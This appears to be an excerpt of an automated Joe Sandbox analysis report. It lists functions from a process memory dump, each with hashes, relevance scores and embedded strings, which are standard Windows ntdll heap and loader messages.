                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                                      • API String ID: 0-617086771
                                                                                                                                                                                                                      • Opcode ID: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
                                                                                                                                                                                                                      • Instruction ID: 4455e36199ce4a1247b6a34a6780cc835a12e6d2bd3ccab0c9dedf420879ef35
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5efe591b216b2969d8e394107bcdac7a78dd11b8f59181a627a151d877ec8d1f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B592EE71E042489FDB25CF68C440BADBBF1FF49311F188159E949AB392D738AA49EF50
                                                                                                                                                                                                                      Function 00F50770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                                                                                      • Opcode ID: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
                                                                                                                                                                                                                      • Instruction ID: 800173e3050fc6e25cb7b58a0575150f2016bc747bfc322dfac3f5fe61f7cc95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8595608e587ce5e22a10a6eefd587d2deb6822b8b09dbd63fc2b0b1d6553dee5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47F1BB71A00A05DFDB25CF68C880B6AB7F5FF45711F248168E9069B382DB34ED85EB90
                                                                                                                                                                                                                      Function 00F66962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID: $@
                                                                                                                                                                                                                      • API String ID: 2994545307-1077428164
                                                                                                                                                                                                                      • Opcode ID: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
                                                                                                                                                                                                                      • Instruction ID: 38d2cfdc7d3ba0c7368d4822b724bc33b3f46a9171943a24cd14cea335d54336
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf4a1f0dbfbdc08c08b240851bc3d16225fb0a556ab4a17977de4feb41752f7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40C28072A0C3419FDB25CF24C881BABBBE5AF89754F14892DF989C7241D734D805EB92
                                                                                                                                                                                                                      Function 00F3A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                      • API String ID: 0-2779062949
                                                                                                                                                                                                                      • Opcode ID: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
                                                                                                                                                                                                                      • Instruction ID: 7f1c415a28137af3d927f80f4803e2c29cbd0e4f77f09b3f33aa18da686b1ad3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b180c1637dd56cc2303459c1da5eb2ecdc8e249765dae2bde453e5a4a47ec4e1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6A15A71D016299BDF21DB64CC89BEAB7B8EF48710F1041E9E908A7250D7359E84DF90
                                                                                                                                                                                                                      Function 00F60BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • LdrpCheckModule, xrefs: 00FAA117
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FAA121
                                                                                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 00FAA10F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-161242083
                                                                                                                                                                                                                      • Opcode ID: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
                                                                                                                                                                                                                      • Instruction ID: 5c075d946e21bb912a752eecae1f1048f026cc6799d8b9568bef6cde6e8e1d5f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ca0f0f13f6c141861a092ab7218681e4ee8ce47330fcafc1c8ba36242c1bb4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC71D1B1E00205AFCB24DF68CD81AAEB7F4FB44714F244529E8429B251DB39AE45EB51
                                                                                                                                                                                                                      Function 00F50A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                      • API String ID: 0-1334570610
                                                                                                                                                                                                                      • Opcode ID: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
                                                                                                                                                                                                                      • Instruction ID: 7ea77bb0531c219f5404f834223e058391dc7897640b8d88b9a01147d8a52d04
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33eb201e655602755f09ff1f5eb04d7527faad4a160ace0ec88078829aa24868
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB610571A00701EFDB28CF24C481B6ABBE2FF85715F148559E985CF282DB74E885EB91
                                                                                                                                                                                                                      Function 00F7C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 00FB82D7
                                                                                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 00FB82DE
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FB82E8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-1783798831
                                                                                                                                                                                                                      • Opcode ID: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
                                                                                                                                                                                                                      • Instruction ID: 08654d7418c462067a379ec21c51dcfaaa4e462c047ccab07662f73d0620c823
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c873b3b8e682f4d50f1c8247586a3340da43293dc2cf150c4bd937b9fe6b315
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB410571544300ABC734EB24DC42B5B77ECAF49760F04492EF988D7291EB79D801EB92
                                                                                                                                                                                                                      Function 00FFC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • @, xrefs: 00FFC1F1
                                                                                                                                                                                                                      • PreferredUILanguages, xrefs: 00FFC212
                                                                                                                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 00FFC1C5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                      • API String ID: 0-2968386058
                                                                                                                                                                                                                      • Opcode ID: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                                                                                                                                                      • Instruction ID: b1be994d75cfe4ca58062476d315d55f5f3af7d815ccca3f3d9f63d3d131865e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c96ffec081b8329b1364381722294e5bd54c0ca6bb53301fb3f7551c708c7644
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17416D72E0022DABDB11DAD4CD91BEEB7B8EF54710F14406AEA05B72A0D7749E44AB90
                                                                                                                                                                                                                      Function 00FD4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                      • API String ID: 0-1373925480
                                                                                                                                                                                                                      • Opcode ID: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                                                                                                                                                      • Instruction ID: df40438abec0425b524ace0e10cde953ade63d2a33d9ca3d34b66fa352b2e641
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 695b3326841947a0f70dc239aec6c329fd2bc6e51842ecf5e70680783b5a1430
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22411532D043588BEB22DBE5CC45BADB7B6FF45350F28045AE901EB782D738A945EB10
                                                                                                                                                                                                                      Function 00FC4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 00FC4899
                                                                                                                                                                                                                      • LdrpCheckRedirection, xrefs: 00FC488F
                                                                                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FC4888
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                      • API String ID: 0-3154609507
                                                                                                                                                                                                                      • Opcode ID: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                                                                                                                                                      • Instruction ID: cbef9851d8f1d76b444bda1d4ee9bb888a2885f860e00eea7b1b05183f1061f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d880ec8cc2ec5ec53490cd0ddc812a93057b87cad737fb8490dc50354f71f319
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3241B032A042529FCB21CE58DA62F667BE8BF89760F05065DEC98D7291D731FC00EB91
                                                                                                                                                                                                                      Function 00F50BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                      • API String ID: 0-2558761708
                                                                                                                                                                                                                      • Opcode ID: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                                                                                                                                                      • Instruction ID: 0f40753e2255b726c6c8edbb427fadd550775f6a41329c2a7690888b957ddffb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e22f5ac160cb67bee1c8eee990540a54b59397d9eaafe6c78b07a7dc88853f6b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C11E472315941EFD728C614C8A2B79B3A4EF85B26F258119ED06CF251DB34EC84F751
                                                                                                                                                                                                                      Function 00FC20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • LdrpInitializationFailure, xrefs: 00FC20FA
                                                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FC2104
                                                                                                                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 00FC20F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-2986994758
                                                                                                                                                                                                                      • Opcode ID: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
                                                                                                                                                                                                                      • Instruction ID: 2a7923284240c63850e5eb5668e228fd38eaefff4841f2b7f0dcb9b1b5d3addb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93e0d38ad085ddc40d28bda6318c067f0b809617411e05e11babb2021402e09b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDF0C231A40319BBD724EA48DD57FD9376CFB41B54F540069F6407B282D6B8E940EA92
                                                                                                                                                                                                                      Function 00F503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                      • String ID: #%u
                                                                                                                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                                                                                                                      • Opcode ID: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
                                                                                                                                                                                                                      • Instruction ID: 011816e10652248c50b3c1f233102a6fa875551fbc7db04e0983615c366eb588
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46a44940a2e75414523fa8f7ac7ac679e728cbf544dfb910d60141302d8e54fc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78715DB1A0014A9FCB01DF98C981FAEB7F8EF48754F144065EA05E7251EA78EE05DB60
                                                                                                                                                                                                                      Function 00F4A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • LdrResSearchResource Exit, xrefs: 00F4AA25
                                                                                                                                                                                                                      • LdrResSearchResource Enter, xrefs: 00F4AA13
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                                      • API String ID: 0-4066393604
                                                                                                                                                                                                                      • Opcode ID: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
                                                                                                                                                                                                                      • Instruction ID: 1e71dfa7646d3feb79f7a8b6ec773aeaf3c794a0d92a344c4c27deb59bd6636a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2015be9bab5c548c935f71a2c90cc0ab18c74824d3f415c99c660ff822de9b02
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34E170B2E40218DFEB219E98C980BAEBBB9EF55364F14402AFD01E7251D778DD40EB51
                                                                                                                                                                                                                      Function 0100A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: `$`
                                                                                                                                                                                                                      • API String ID: 0-197956300
                                                                                                                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                      • Instruction ID: 7ea7008e5ac5e0e598f74a957c0525356a797b2f31d26a8f15954dc7300b1b77
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AC18C313043429BE726CE28C841B6ABBE5BFC4314F188A2DF6D68B2D1D775D545CB51
                                                                                                                                                                                                                      Function 00FBE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                                                                                                                      • Opcode ID: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
                                                                                                                                                                                                                      • Instruction ID: bd49bfa2cb1141b53843d57a3a748180241291fb1684fffaae904888ff8ce0cc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bec924169a6b099303121cb926b55e7359c0252754ee447c83c91a50d9ac91af
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F614A72E006189FDB14DFA9C841BEEBBB5FB48700F204169E559EB291DA31E900EF50
                                                                                                                                                                                                                      Function 00FE43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$MUI
                                                                                                                                                                                                                      • API String ID: 0-17815947
                                                                                                                                                                                                                      • Opcode ID: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
                                                                                                                                                                                                                      • Instruction ID: 2e21c936143f76335e4441df83172551d024f7b79b5ad50ae672f14b054e299b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44b8cbe167561dd9029e74ef923cc8b48a319370207161dfa8fc9f4957c96a3f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 795145B1E0025DAFDB11DFA5CC81AEEBBB8EB48754F140529E900B7281D634AE05DBA0
                                                                                                                                                                                                                      Function 00F404E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F4063D
                                                                                                                                                                                                                      • kLsE, xrefs: 00F40540
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                      • API String ID: 0-2547482624
                                                                                                                                                                                                                      • Opcode ID: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
                                                                                                                                                                                                                      • Instruction ID: d27c42d1eb6b541f8210f9e3856a185e7b0648f7cc5e1eeb4cfae57d0528103d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3f1c038cd6b8fdc961ee17751e9ef67a235d1656fa977958d8b0c7279398b9c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C51BE729047469FC724EF64C4406A7BBE8EF84714F04883EEADA87241EB74E945DF92
                                                                                                                                                                                                                      Function 00F4A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 00F4A309
                                                                                                                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 00F4A2FB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                                      • API String ID: 0-2876891731
                                                                                                                                                                                                                      • Opcode ID: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
                                                                                                                                                                                                                      • Instruction ID: a4999bfb603fd472fd582585132ff859a0e38a367f0ddd4086955fb5e5142e8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07e20e65593d30f2350731989c40f077464fa941f5a54d3bbd8788cff39a83e2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B419C71A44649DBDB21CF69C840B6ABBB4EF85750F2440A9EC01DB291E376DA40EB51
                                                                                                                                                                                                                      Function 00F7A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                      • Opcode ID: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
                                                                                                                                                                                                                      • Instruction ID: 4899c2fb53e50cd2b35b395c2770369e427a864c7df05c331f427daa1dd78e55
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be89eeebeb9b61bc315b3a642e5e385f36eec5c7d8dba156cff1c0d52a8bf522
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE01ADB2240B00EFD311DF14CD46B1A77E8E784B15F05893AA54CC7190E739EA04EB47
                                                                                                                                                                                                                      Function 00F4C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: MUI
                                                                                                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                                                                                                      • Opcode ID: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
                                                                                                                                                                                                                      • Instruction ID: fb439a69642d221f57d3b1dfc8540d7c9e1a712044e625d0272f57a18e910ffa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe3c85b42959d6d252686498863bdf1c1836a65365989f30259e4bcb3b568c2d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A825C75E012188FDB64CFA9C880BADBBB1FF48720F14816AEC59AB351D7749D41EB90
                                                                                                                                                                                                                      Function 00FC6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
